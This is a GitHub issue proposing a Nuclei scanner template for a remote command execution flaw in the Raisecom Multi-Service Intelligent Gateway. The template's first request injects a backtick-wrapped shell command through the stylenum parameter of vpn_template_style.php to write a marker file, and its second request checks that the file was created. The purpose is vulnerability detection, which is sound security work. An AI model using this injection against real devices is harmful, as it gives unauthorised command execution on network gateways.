### ISSUE TITLE
Remote Command Execution Vulnerability in Raisecom Multi-Service Intelligent Gateway vpn_template_style.php.

### ISSUE THREAD

**Issue by test-bug-ux** [projectdiscovery/nuclei-templates#11864]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: raisecom-rce

info:
  name: Remote Command Execution in Raisecom Multi-Service Intelligent Gateway
  author: 3th1c_yuk1
  severity: critical
  description: |
    Remote Command Execution (RCE) vulnerability in Raisecom Multi-Service Intelligent Gateway's `vpn_template_style.php`
  reference: https://github.com/koishi0x01/CVE/blob/main/CVE_1.md

flow: |
  http(1) && http(2)

http:
  - id: inject-command
    raw:
      - |
        GET /vpn/vpn_template_style.php?mySubmit=true&stylenum=%60echo+-e+%27test%27%3E/www/tmp/test123123.txt%60 HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers:
      - type: status
        status:
          - 200

  - id: check-file
    raw:
      - |
        GET /tmp/test123123.txt HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "test"

      - type: status
        status:
          - 200
```

### Relevant dumped responses

```shell

```
